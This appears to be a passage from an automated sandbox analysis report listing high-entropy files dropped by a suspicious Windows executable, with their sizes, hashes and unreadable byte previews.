              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.874988106740513
              Encrypted:false
              SSDEEP:24:2YDLwsELeUJOG9y+1/h6Rl1zC4+WzoZl5QHX7++Tgi4T8ik5daR4WMbbD:PDLhUJp9bee4+WEZlQrtTgTSdU4nfD
              MD5:FFBC0D4DEE9491085D291D27AC52F024
              SHA1:53EB4F55EA1636F0D40C6F802AFE160F25931097
              SHA-256:CF58F0BFDDD6F0747CF80478867F77D112481D3E6F2376F3D97923C037582968
              SHA-512:7A2E97E9AF814ED67D88A1519FC0B7CD704188E9B872CB54E63DA469E932BFD03EA45115BE802A71C96FEF96E64558820CB249A061FCF7D39341071CA994CB5E
              Malicious:false
              Preview:<?xml9:.P'...p.m..e..t.}..c....AT.'.s:]../.7..0gk.bU._;0..m.H.......t...0.......Z^C.../5...<....^.#6.D..z@..,./3O.F..[......-Cb...q..).....M&(...y....]Cg.9.....B...g].....h.CP.~{....?.n.(...jD..<..g.!......uv.rW-..(F/...@...8...{.y..&./..z..Y".....!DH...=..37^.*J.z.9W..s.'..?...2H.u5@TT.~..7.....J...%....6|.f....>.6.M.M.}S..?..WRQ4... GC.\Is...p.XV....>8KgT:....T........+..fO..T.6V.>.@..O.Jc.M#.6..:oFXf.a...t.?......G.E.h.}|.U"%.)l......F...(...%:<...9[<.f...w(...J.M.X,....5....;..E...t.E`...n.ws..G...!.\gb...5W.RNc.N......LP..`..J.T......FD..g)..b+*.G...`.ug.i<T<..>Q.J..c9.=........r.............A...{....u..{z..@.=z.9` ...._zD..%J,-...'..^+.&H.%n......A.T.I.-A<%......}F..t..+..^.\p)..0.a.}..(.>..,S:..wm...dm.C."{.}Vns....6~::.ahS....NkYW.W..<.%L..C.Un!+..).....c..@O.K27.s<...\uFw.0b|.!.Ce6L....\]x..6.%.....$.C..0ISu.4hc.#..`f.UjL.......8.2.)....:.&...ol.,|"!....T. 7\...L..a.[..... ...E.O.z]#..p..`b..G.{V..+....@S.3..6^ .J.F5
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1715
              Entropy (8bit):7.889230667818405
              Encrypted:false
              SSDEEP:48:550yKSvfK4SQun5FYZ9T34DAee3Pe/cOZD:X0mfKrh5CPMseOedR
              MD5:CD7050D3E0FFA4D1AEF25897DCF89B98
              SHA1:DC859ADABC58A08AC7C7BD32AE4C0ABAA0FB6904
              SHA-256:C30A2E85BEA898E320A73AEC4A772FAD1487029E891D9A541184C6D43E862719
              SHA-512:A87A9E8DD7D4FD7EE88CA45C061C450BD285AC3FBE19C406095A4BCCDB848382095C2134F60320B314E4AA456D02777F4BF05921F153ADA72D85C589607CFE8A
              Malicious:false
              Preview:<?xmle).|..H..9.......H.^.3'?).a.H.II..\xZuk......c..9.x.Y-.......M..c..(J.+K..U..bT.0m...C..P..[.|pO...,.g.)....v.....,Ad.z.'^.....i#\..1.p3...x=.......U.n&r....r.Hj..[..J'.L.Fap...:......7.H......f.H...L^@.C.Tf..9. j...g.r[@.....`...3.Uk.....V$x&>..`E)W.;..r .#..G...F...w.a.$k...^..C......E.j...b..G.mr.....T.6...mb<..u...6:.j.6.X.5.H....9$.R..Wr'.!.i...i.xQd(...bB..Z...c...$D........"`...v_`;..2.....#e`.......`.c.......K.W.7rV#...CR.R...`.PH....e.|`.pW.6.6...F..bV.]8...P.w.m.}.{..,.G...k.|P.T..../...0.rh.z ...*].......L...pRL.../...A.....`B.;.>.....\.B..*. @..q.Fwsx;.>I@...#..V...^..+.e....)...J.[...Uk.AG(...ph.9.e...[x..n....s.L...A..2d..A....:......H..#...........~..jbA......2K.F..>e.k.T..6V....7j.M..r.x.......&V..<..._..P.. .e....4[.,4.[..r...N.;y-..oN.,..8...S......O.I..^.Oj..Q..!w"J..BV....k.LmA..}.......vV..I..... .>.m.....^.V....6..;..X=..:(...r....ktc..*...&.M.G.4.7....E.S.......]C..[..D`..F..W.Q...\.j.k...9,.1.o...:~...b...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1752
              Entropy (8bit):7.882833082572209
              Encrypted:false
              SSDEEP:24:zXZH/e4K5wRP7/KUeBrFuevymRvvPrQrnYdBTBetEIomxkdrO3nPXYOZZwm0CoN4:o4xNojRfrQ4BTyE+x4rO3PXXZWt1GyED
              MD5:341C600A9359CB1697335E760C160557
              SHA1:ED565B8A081A0804668CE21AB27A8C9F3535C45B
              SHA-256:CD05F6EB91AEA9873DEFEE5A45DC1FFDDED0883240F102904CDDDC37132D8C66
              SHA-512:E07DE4BB357C24C1DEB248161831E3ED26B5590112D280CB40E519A98C766F7D1AB215156A482272D0A010518F7C3288DD03F4613595578847317D0D50FBDE56
              Malicious:false
              Preview:<?xml..3'...D.)Jk.Q.K.&...{.S..B.q6..[ ../.R.`.k.bV~...s.[O....b....7[.Z.Y..Fr......eA...FHi.e.j|$c...`~..U...3.{....+.......f@..7.<.....`"=..v.B...........w....07.8..S&.?..d.......>..'..r....2.S......c.7.X.*X..ph.Bd..G..M..].S.G...$.~.v.h..a'd.....e....~._A..7wm..%......-1..0vU.AQ..S].8.7.~.p..........vE#tx/.:}C}e.&...=0.`.^...Y..CI......&D...Q-.{C.I7..nfy...\.k^9...S..Q.|A.w;.f._6....>v.F..{..WK"...bdK.<..0g......>..V...D..]V...W0..5.H4c!.Km^..._..ZY..3........)...}}...*kr. R.....n.l._Of..^..\..;`.]4.Iy...*..G.^v.!.......%.N.fN...%n...Oh.+.......DKg....c?...5..........!.o...V5..4..s..=h'......a=..).gR.*..&....8a...I...Lz.........u..:.....VbU|.]Gp....mF.0.....h9..qr..'+....>..0..)....S..|GS..b.d(.w.K91.'_..f..h.....9t=...k..`........Y.......\.q...Q....JC.. ..._...f.5..%W....L..7.....?.u..r."G..".&{]...,.C..v.O..GC.UD...N]...b..x.....(3..Z$.B7Ry..f1.SU..XNf*Z%/..xM.-Jp[N.%.....;.9.D...l.E..........n.=n.. }..Y.9.....A.s#....Vp^..`<..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.8867570704218775
              Encrypted:false
              SSDEEP:48:uTYF4TK49YJTYyO4sjulg9UaAOZWrIo2w/4GWVmf6Bv5M/RD:2YF4mDI4Iu2ZWrV/lWVFB6/Z
              MD5:B9AF06436D22A089AEEF9C2B6FA70CCE
              SHA1:64CF5339605450E33E3BCB49375D4A43CF255716
              SHA-256:F774BC4382042D7CA8AD7C5D8FD03F1B0068A59A6C4049971024D8B6DA4E99EE
              SHA-512:03C615A339BE211136A0DD13D2B15848CC3F4956B80FB6ABA009DCD7A3CE326B037E628B751AAD592D26B6167860920C1986CE78B443063C9690194DB7025810
              Malicious:false
              Preview:<?xml.yW.|...9..|..V}..A..tn.7l..:.....Id.=[....N0v..P...=H=8/..0n/.h.Vs.c..+..G.N.|dK;..*..@..f.W.v..._0.]v.r#.!.Y\OD......9)...{.....R.._<.0....u..W...S?Z....$...~hi..............'..2.&.."/_e.%#.W...,S..o....6.9'...._.R4[f..8g.^3........&..j7.eh.N.....:}(p!.5.. ..)......._.{;.mN...k!....,...:.u...84o.;..P..F..e......_3.l(.N.'.....7..6B....X.O... ......h{..Y...!....].....0EAKF.:....l'.........#'x..Y!.u>.;..3.$`.c Z7I. n.*.^.....B .5.P,......r6....'...g_.6U..3.-....]....v....R.R. U.L......u......|...l.8.~...<,....+..oM._.-.^......<9....d...P.j.Vx,............Z.z..43[re..b.....S..;KNELd..q.S.M.S+q.4...3..74.0.NZo.xr..P2..SgQ^.T.. 3\...h._8`...m,g.<H.3....}P8..n..z..........t..........b.,...9EZ....C:..E.|]7F.........D...|..Y..G.@\$.h....L...b.\9(.QR/?...|."~.......r"?.[....%[..4...h..Z.R.Z..p..?.............|d~..-3b..7......y9\.O)..}.{m.'.....'....R23Y...3.. .......J.f.?.6........I;.}:....l:..lO...........sn&.u....+.K.[..Vb.@.no.:.cX.W|1.&+....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.8791464970308756
              Encrypted:false
              SSDEEP:48:sn9WLAjmiVBDtNCC2DuaEfPATgv5f5UQpAy1ZD:sn9WQm2ADuaEVv5pKyX
              MD5:672097CDD2A85861CBD68E590281FFFC
              SHA1:8A0F3F948C339C3E26011DE91464DE05DF74F741
              SHA-256:FBB45D38D6BBE7EB8AE0646FF2F8CC969900BF8820C4D34BE25CE2325708C950
              SHA-512:AAB5C80F81E67191591EEFBD79B33E66E5CC15D82842C9AB6110919E98DFDD1B28A96B51C33C94F585AA316D046671BFBE04A4782D160B900F08625B9D8F2C87
              Malicious:false
              Preview:<?xml..=....}d ...'.."..].....1v.~..9.@....m0...c...H..$I5..V.M.8.....5t.Z.WNl.....QW..Y.P+....@...p....p..*@..../..LY?...2.."..NXYn.^E.)E.3O.....Y*.....%.C(k....|.b.U...~.E...$.....E.|3..=2j..cP*.\.@...w..N...M.%....D....OYUR.4..B..F..{.3.[..XL..s.Q.m1e...,..e..M.\.....,.......].RBI...k.....,..~....`&]P..^.;W.*.....ZB...B, }-k5}..S..t.m...H1.e0B?[+.,._-.H.T.h?.L....cg.4..h.....(....-....E..._)/.I....S.S.....K....=...}5D.Ap.A\<{G"e.....4^.(....|j..,.....,T..G...`u.O.....RG..."q....1(.+X....6...:...{....Gy..V...o..0@...+&8......!o.....^..4^..Q.s`...cz..Y.Pc.y...~7..1.......>..JJ..._v...c...q.DJw......$.....&.IDj..k...Z...\.._.f.7{../&...G..@..Lk.uC....;.#...pk...tU....?]..(.|h.J.R.b.;x......9.nt.$..F....?..N.1B............^.a..h...4...|b.,Vr.....Dh...'{...X.7.....0MS....7<./~..c.t[.?..Y&B..)uK8}.Xu...s2..~...Y\...f.T....2Dm..O.6..O......4\.-:...7W.......).OMi.....n..br.n....Q..5.k..,.a..8F..J..Rw.Lb.bD+..y.*.;....N\..qcm.....U].....VY...(.LSV.s<
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1721
              Entropy (8bit):7.890041407771166
              Encrypted:false
              SSDEEP:48:Oa3OTTUsPaV4fPJWimYBZzdlu5j7uhD8RD:LHuJWiVRlQfmIZ
              MD5:4B58C935FB40653C8A050DF232D9CF0F
              SHA1:E3B08A71F34D35E21413F6A3B35EE7724517F4C4
              SHA-256:60DE9D8444D49FF10F8CE0A81E0ECEFAEC0FC01A24F92818BB82125E698D082E
              SHA-512:4FFD16E058DB36B7BCCE28E5DAD7381666B462970E8D178286939C5531485A9018F6BED536C7337F5F409839E0EE0F4716274220C656D2A0AE3FD29A9F5D3526
              Malicious:false
              Preview:<?xmlIF....B;....{...(..Y...s|]..o7...]....HK7......G..:.Dn6.b.X.#..K.o.f..;;.nE.....k...w..$`.^.t.J..f.."i.%;.......O.)..z.G....".|L..(CC..LG.Z..u.;.....T.I..[..z_.m....O{.:.}.F.Y3. .....$W..2?....t:.b..?....O.wo.2%c5y>.9..e&:...YW-..C.U.]uZ...~q.Z.9O%..W...B.%-..)^.....E.2...A...'..._Q.Ms ..]...p.T=.....>.d.^[S..0..............8.m@......3kH..>.Pa..@......8....w..[q...x......6....:.E.(...Q.f.....4P?..Y}en..Y.]..*........K..$A#A,...-..:,.d.34]....&@xUx....lbn...?.L..2.w.2R.?..]._...|..(.o...O)....fLB....-..e.t...a..%.P._.EJ..z~^...H.7m. /(..../BNhT.n..H#4.....N..rh..p.....6a.. [.0..(M...(....H..o...F.....N.....x..t...).^ @@...'.v.bq.71....1...`.*.Y..A.....O(.YVV....0.T.v....o..R->(..7.....-Cn..x..........L....K..eH.GK-.9;.$....Q.X...;.+...i.i..%.@......C..b....Q..Z..h7Q......U....m...@|7...=...w../......U..]..XY.....t......q..A.p.L.3.......x..6.A .%}54....B...E.$...`..oo=Cm...=O.EQ..3S....F.....He.-.Tck..d=N.2e...7.h.Bml....=..J...:....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1758
              Entropy (8bit):7.885836639599786
              Encrypted:false
              SSDEEP:48:75avHtHgBBmYz1fT3+KfIDm5uRqoEgzkQwj0kIdZHAyQ1D:7cvNHTE3+KfuRq1jjTyQN
              MD5:8EE8CFEA64261F3D894C6589ADBA36D6
              SHA1:8293B85FB4DD61C1ED31D7F9F8DD162FD90A3E7D
              SHA-256:B8715FA0EAC75EBFD338D609673A3C295657E338A967097E6D6FF491B0EE20A4
              SHA-512:53FBBD6B1A3ACB7648AAE054961031293869852E5FBF4CE703EF2C74F96B58DC779FE405F3231497D007EF3748D7DBF730BA35E5E34CB629B4C07A95BDFCCA92
              Malicious:false
              Preview:<?xml&M...t..f.i(.........-k.ZQ.).n.g..;f..=I..7D.yM.V..*@.w."..`hF......?...)...>...Z!.QYr.....`.:C[.]#..Nn.s..\..T+.F..xK......b!s..*2..<....}i...^..#...O..V....1.iD.J.1_.b......>.+b.w.`.......%]Z".....[..3..G" .y..........E.k]..OMt..i...Nf.;.>...t.`g..o<....B"ECm..(...4.....i....-?..#N...an5}.2...qJh..f.G?.2..N...=...;.....F.pU.....t* P...H.f...c..;..U.....)....Ws.....(..\..-...r'..0YC,...6p...C.C{.7Io`....4.......G...*.v........s.s..j..\..}4..p..A.....,.G....c..M_..6..........J.[.p..x.,..l..!o.....*J..xNw.....ul9....+...,.W..W_'......PDy....CSAb.E.vS.D..u.$8.i#....o.....Y..G.;iSs.rV/8:#.....,./...y.O..M&.......fp..6.\..m.J/].}c.....3%...K..n......iM..{aO..g;..[6....i.............#.NIYB.q..h...&.x...3.r5c&dI.......E.P8lt........N...H.......n..........$.t..*E.*.me%...i..."...3D..J.-.#%.....%.V....l"..+..@.f4......_....} ...,\.!....?..|&@...K.v...>'.d.....!..%...f......}..T .8..et(....$4....`UC..AlFz.uv.....A.....8...M29..a...r......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1705
              Entropy (8bit):7.875561905417092
              Encrypted:false
              SSDEEP:24:aMqO63+wYBp4arxI3ivNC1imZ8mAxcNXXRHeQjYK/Qb/lDhLn40SHbD:GORrBWapvNC158FKPeQE3/HLCD
              MD5:7EDBC454D2227754DE5E4136B8AE6DBE
              SHA1:4D7A0972F9FFF0A29F5283A62CF2B386080B320F
              SHA-256:29EA577D8F519AAFF8FF88514270BB882EA0ED87CBAFCEA797209D0D3307054A
              SHA-512:09AEE761B45D1C0142DB5A2343DB03FF6FC94BD88CE0BF29C1F76C5B4D573772837727FA525A4A0015995E1002F9B84FB547FFFE90E72B38AA88E5348C5F19E9
              Malicious:false
              Preview:<?xml.*XEc...[.V(..F...^.h.t6.b*.l.J..K.....V.\.~...Z.8.P..k%...LB.[K[.|....2..*H4c.%....}....[......J......gn.........f...I....*.(.\q./..r...hF..i......TH!.U.i6....j...5E...I/R...BY..R.T..$.yY...|Q..Yg........t.yV.x9.>.X..].\.....2....Q..3^.c.k..t1.&..#..T.]r...,.......{.q|.....0..e..4....jhQUQ..k.X.=.l=..!0A..Z.%.F.=.C.].t.7b....c..6.\....L{..:R.~E.....%.6/x....<...B d.d..g..>....%.d.v',.*.0W../.'..:.f.`.:....K.q.vs..m.."...._.@..#..>. ..p...{..[.F..>....K...E...f.. .........ne-9..%!....,.1&....z.........'<{'x...$G?....G2.(...ser....flPy.F...s..M......{.l...3.k..Y...H.#..M6.al...r.8...P..`...G.........H:+&k:..o+x.aR.#.]..%..]k.~..A..s...c......@.?..f.Kh...@ G..5mw...V...<D.E....1.u..s.`U.K..N.......!.6]....Y.a..=l..6..q....7>.../;...B..`.\.9....f......E..e..P,'~V..R...%..WcK..l.V..1Df....6.e.fI...yrU.b(Y...>*6]0l.mr.-..+.K..2}.X.......9.Z.c...J.47:o.K...x@..z...s'yyg.Pm...Ca...&........I.H...rT..U.\..S.M7!..:.;K.h..#].U#{.Pw?;mF...~.Y.x.Ky...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.886037188944028
              Encrypted:false
              SSDEEP:48:GnI8xcrC6INOBfo0vhA9GKnqzjcsEgrhebcrbD:lKcmP0JA9GNzjFd8bmX
              MD5:CF49D4DD32E6DB19A0F408EC25FA411A
              SHA1:92A0816AE32A642A54118A34288EDC9D6895B15F
              SHA-256:91AD0C3497B58D1150B9E460A1B09602AF92C1D394605BE4816490A34DB2B1EC
              SHA-512:85A0E31B98D48251B770795BCE82D46A3231F78534EFE6815D1764B656C1687E600E4C0F3C23818C1BEDC609812DC77EAEDD85EC5087ADFAC3AD06C2F2DA7B20
              Malicious:false
              Preview:<?xml.L.W....+..&.Z....(._..I6Z.$.F`..g...i.....k..<..)?........`#T..V.\7A.....XN.blYqXA......K.<c..L../.3.".7ga2....T....D.:.V....U..-.W.Y.......b*......l..T5.(#...g..(...N..q....i.\.o......h.,.s...!v.{B .t...C?DT.)K.,Y...6...6.Y.M/G.l....wI_.`.7h.".^.A5.n...y.m.t......H...I.c..I..0.....`..p.XS.b.l.H.e..vo..A.Y..].%#.....u.{..i...C..b.W..../..~..K4..n.F&k..M.2P....7....bnF..b..Z>.....>J.v.....'>..^.....XLx.M .N.M..d...V.....}&...a. Mz}w..).0...H....8....t....T.?2.kV..x.....7..d.n-...,..x...s...P...-...&...DZ.i..#Gr]Bw.....|^AK.}e`....u7.^l..@..?u...`.S.=..WB>EQ....*]W9.W.6..,..sH........t.a..J.>.<}:5WIg3xZ...<.j.}.....U>4...i..}X.........8LBf..>.T&.RE.................8..Q.,..-.`...UM+y.j}..%.......J.....Y:Z....9npsU.%..6,......}?.}i71.7....l.s.&.....S.'.(.Q...]N.x.@.7..<.W.8..Q..!..8&.... .-y\...3.kCo..z)>..'.Q"Y.x,...^..G..>5.{.z7...umV.f...l.R.,d............q.yE....G..x.O....F...Iw.\".D.A|.%.lD./..o.uh.W........m=/.&wwT..D..-d.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.896436288200483
              Encrypted:false
              SSDEEP:48:NqhOXk7nzf/K4gYNFda7IL9V9NvRHfeT/7LTqVVhvRhD:kVjzf/jgqdaUTp/Sun3J
              MD5:0969B6830525D956C12189E7B6679F2F
              SHA1:3DD2B6BB946A869656D34F567388F19751F69086
              SHA-256:7087FC968424281CA5F8644A7221EE72AF8FD61D080CBB501DECAFE25369E8A2
              SHA-512:974448F48B61FBB0F0941EBF387C121E826BE39D71A0F111CE2F494606D3F333C0796FF52B0A61725199CCC795E62E5A06FEF953FBE92B558602A065CB3836C0
              Malicious:false
              Preview:<?xml.{.......Pa(_U...;."l/v.?u..........gF.U.S..\.h8.i....]Y.7Y0uI..T...e..h......./....T.|.J..k.$.W..j+.NpDn/9....)./.p8.<O..8.|q..W.Yn%.U........S.;...#.Y..q\..V..nS....;#7-.....n..B~,...U.Hd.r.....i~...\u.k.8.9(.;z.h..t..Zs...5.\M.6R..v.'5GDf...O2.r.!.u5.m...).j..#d.k.G....A.... ..#.........5.9...]..H.@..}.,.*/......|&].p...J.....!.3..k.....b4._..Ca.1.6.?.hj.I.s*...h....,.~9.(.........oy.r Z.wAZ....d.N.............W@.Ad.)X...o.>q.U.G$q.....t.{]....z...W.s.c..ps.....>.. ..;.\...u...g..K.7....l{=..(..y.Gu...q......8.*..g..Y>.....`.pe....R.&}).lOB.P.c.5}...T.+]......px.._..\Q&..P...P<.9BA..7.E..'"`.T.ev......l;}.~.".C....X.f>O.3......P.~..wH....].:.M..l....D..v.Lk.&.(b.R.W3....WO.q..J~.Oy.7...i...J...zy...f.@...|.r|...V..... %.SY...`....eT...c.,.R.I)..7..[...h..Y.....N..W.I6.`%h..7.....35..u..Q...<.....U..?...~3...(...;s..^+.HEy........q.0.A?.C...hw......ql.+..X..&...'...aUt8.....A.Kt.W{>$..*.sr/...q...X....s...f#.W.`....F.t.,...;..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.896701656453853
              Encrypted:false
              SSDEEP:24:0IES3mHs9jpSeCzaTH0rA54VfHlywG2DTCX4su5rM7f3YsdMfoP9lyWS81vdKIEX:04ctaTyAifHlbqXE5M79+kly+K1D
              MD5:79F95C9546439CBA15C67D0F1C509195
              SHA1:8BE5BAA6C399B9E2FE19E77E537EC494661A026F
              SHA-256:1B32DBD0756C98FA4A4B91802FB2F69FECDC83D89F18144F8443D8B753FFEBB7
              SHA-512:0F3FF9C6A98D825816E13F6795347D9A408FC36A303D9BC184CE398344136C9AF4464EB4EDA0FF76453CE0008500DCADA63E6346B6263DBB34619B20494C6FF4
              Malicious:false
              Preview:<?xml.n.V.]Vf..Ea#..MJ@..~s..?.3..N...o!..I..0.A...../V6M....<%..B&kK.m.....OX....l..I.....YL.y...!.k.'.u.^Z.H...JJ..{..6.6;v.]...X&.J...l.......MI..T.&.M.....>...4........8^.....|.z.X..s..7v...........JC.N...E.... .....z..7.!..aG*'.*.|wUR*6..o..g._..C.W.+q..M..j.G.s..!.E.;.e...[.J\..-.|.t.eu.v.%.=..u.l'.i.C.....R........k. >....!..K.VUh).1.>....!.;..$.%n..?.;...Fb.....TP.^..vV...-......M...~.h..}n....d..$e5.9.........C.7B_G..I...{.w..f.]fwO..O.G.......w..3.".*..2.O...y....j...j....#1.e..n..T(fy.{....i`...">...K....+...&....2.;U....3XG..]?.............0......5..H..:.w.1.[.Qb`.pK.H....g..Ex..@(k...#.`.a..?.b..rOl..][.y..h.=....m.4.z....\U#..l.zwD.......`.......g1...c..J..R.K.A..w..P....u.....xz..D"/...~...^2h.a..I..:.u.|.O5..3. .....W./.<...._A....t.......Lxx)G.K.........L6 ......'..-/.(L.........@.J=.5%..Wv0.Y.....W....5..UM....?.l.S...gl..k.q..&.S.M.^.7..t.."Z.......&.u............6n.].{..%...L...3..S..S.a)....y.D.......2T.....r
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1705
              Entropy (8bit):7.88117133769059
              Encrypted:false
              SSDEEP:48:MGPktstzXGWyawdOsH/7Y1zGvKSquVxz4/ocD:9Pkwz2WydOS/01KiS3T8AY
              MD5:2B1D411E77B42EB50C7E405AD0D8AB67
              SHA1:5803E9E9339DDF31CCA12130F276E803EDF6CA34
              SHA-256:C367E7B93D4CBF355FD47CDCE471BFA1A7575E285C615A8F158BA4B6012084F9
              SHA-512:E3C55AA85FD515E5192AE2A2338E683849F3619869A52492388CBB1FD0709DEF7FCB0DBB23C3A93A9B61C53450404926F15FE4753F46BFB5A50175D630F4F26B
              Malicious:false
              Preview:<?xml....6.*;._6...}...a...PQ.t.S.[#..j.'..,!...@....T.D.j`.v.}=..?..8_l.E..Q..K.5s`O..{..x..C.<#,.\x.9......ET......n..2.p"3sDp._..n"...K...h.._.Y,.*.........G7[.~.pX.T..X....k...q...........b........5..{..)....6)..Zv}..$a.j........]^.......`..@..K.j..q^....~M...FPNB........K./.G.+N.vn.......qf.X...fZ.7....f....z."y*..(..A....<.......].1.....>Qc.{#...|...6.y.f*+DM.wB........,..zY.yl.`.p...@...<*.|../.. ..:..L..U*..c.....b.....){9.......[...R..y.I.....%....8.N....4....'>......3...d..L.#......N.l...M.....]u..X.<A.zPgc..4P9.....v..p....../...9<.+..`.=.%....{...x..._....U.)M.O..s.dRN......M..=|..[RZ...L1.5q%D...yN80O.v.....@........O....+.....U.+.D.e~%R,..a....<)a.Z.6..~.?2.......>E.c..a...S.o.R..wL.....f......r...v.....=%,e..:....#.&AH*G).}O.......q...'&[.2G.j<E.N..s.P.I..,E._.....U.8.."..........d.2v....IW?.K.+...O..J.l+..t...=...N..F.4b.....#e.#...W.>m..Z.,o{N[...R..1q.2.wg......`.y.WE~.S..NP.U{..Xm.....|.....fq.ef.:....{.W:e...z.C"..g..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.86659808154306
              Encrypted:false
              SSDEEP:48:PXZC0sufLOMNVudIVTgZtHGFrbhSVP5/YqKMf37vt0D:A7sOMSFz26h/Vg
              MD5:734ABA3015C679B7B216CEB67C551D64
              SHA1:8FDF12497D9404A5F8EFC2665A3B30056F974AE5
              SHA-256:D12597722F9FC7EEE8FC8635701179310B8CFBA5F2E1DA7CB05001ECF5F28428
              SHA-512:6EECA2B12F6BE584DCFEA3A5774968C674C4240A91BEE302620B701820AE16D47429D24DA72FBF8614317534920EA03289F48FF362D5C13B6CF86462E181FDE4
              Malicious:false
              Preview:<?xml..:.7...'.!]LG..Q.6r..eR~X.XJo{.?...F.....0=.L..O.......Ti.F.w.JT.|.`.JV...g....G..n.6.O"....qt..3..1...m. ....,k]...f.5..Y....6p..6....t.c..A.....6.~Q..i.^<g....>....EHc.f)=....za......sk]..4.h5..q.....].:.@.......e...f......N..@&.x..H.t~.7.A....9...2..@.......... .O7v.B..+.kz.@.6.#OR..qJ.......,5...xt]...W.8V.5..n..e.k+...1.C]..!..v.b.Z.n.>..Q.."."......Y-p=.q..W.8c..^ZA.Q,a..s...`.....c.Z9....>y.Ni.7L.Y........O...4.b.i.b...*.B....W.....7X]&.e..Y.....f%b........sG.....x....Y.<...p?y.Q..6g!y..XA.9..odG...;u.X......g....Sa.......{...bz....3..FQ`+.....V...D...s>....5...wi..F.4'..ur..P..CUA..N+.[r.=(.....7.]..;A#...0.E.nCIhHs.=@.u....O........."4.....O......;R.pg....7P4..-.V...0E..(.......>.6...T..p).&.N..H..R.UO..ms.g.3........g.8..)....^?..r.....33......7....y,..x.-..]J....e..P..Q.w...K..;.b.7Mc9.+....Fb.m.R.Ph......q...y...C."..#.T..&.0........%.R....0...H:.A....p...+..5.......r.0..Z...P..4..ug.1.?6}._...B.....zP7...txO.^.\..g.c.r... .
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.874585574279131
              Encrypted:false
              SSDEEP:48:2SScJZdgKyoyjZ55zHUSFxyeXZ6HpohykucmD:2SJJWjUSHoHIZ+
              MD5:916D45F0B9EF157236711C5682A96F25
              SHA1:F63E6DB3140F1B6F5074522D0427F4CF36FF237A
              SHA-256:34468D3C58F926D121B97C946905454185D2A6D3343CDCC3E72CE30E00AE8C85
              SHA-512:523CD80B807AD36C9396C118042457054F8CEE9EF95E440C123CBBCB861C427E446C2FDB0CAB065138ECB1201B7C482FF952EB51919C1AE25BB14E0FC93BE67B
              Malicious:false
              Preview:<?xml.t.dYu..B..*.K.a.@...N.y.....S...E...a.)....j...-..re]7..`.m..p..t.D.....]...+...Yr]...=.....y.)e..@NU.............]...j.C;_WV!..}...W^.~...R...O!..2LD.@...![.).^.;....rE..... j..[.S....l.s5.`.f].Fl4....)4........;J.=...f...wG....wWL. U..N<.u....CC>+..n...S..<.%.uOu..&_..w....[....Y.gv(.....Z..Umm.6 .$^Rh.....@.P..-.:.T&S..D.Zh..B,..k.h....j...N.L9............2&..:(....=.s...^...H....e.*.S{...w.m..w...s.....h.8B.!E....a.Z:.......&2...m..C8...@..$m..F.b.uU....a.}.bx}.:+..B.C...y.V..k.^....Q..V.....uc.E~...*<.i.z.....a:6|........."......3....I.m...c`3.........*X6.e...q..^4.X{Qh.Z.v.3.L.[..;.F.c2_...{.n.....:k-Z[.a.l..d.....K.R.._U..... IP.".r..Ea.O1......j.Y...}~..k.........>l9.'.?..-.6..U.9x2........>...W..G...x.V.$l.j$..9.?D..BZ.I.#X.t.~Q.....=..=}...,l..H.RB.q.X%.LU..j..1b.?aBH....KD.....;..Gti.e'M..J.1.8Q.].`.e..Q..T....h..1......."1....L....D.'d\...h....K..k.....X..x...V...&...}...S8..G.a.BC`......3...M><.8m>'kv..VV.5.aa.s..Y
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.869354348943011
              Encrypted:false
              SSDEEP:24:/A0G2EZMMOOwjSrnaZpDytU/1YOaujsIp8fVmfE3i2H/n3Jn4GolwjkGjNTzSl+h:XFMhISW3DytXIp2H/3noklil+cyfd9tD
              MD5:A8C679EC3244AAB83E563B7B039301DB
              SHA1:7FCD5F33A00BA252654EF0F5214FF998D2877023
              SHA-256:C735CDFF15499609A54E490BB0A865C48E0DA2E17B3855D0F9D54A106FB90C97
              SHA-512:A06E55473D4BE7AE34DCC4AE92AB2C8E699007EE24559BADD111BEF66388B0A2578B57632D9B067C0ABD3CB7A3BC71A009819D4AA633FA030699571FA3D06F37
              Malicious:false
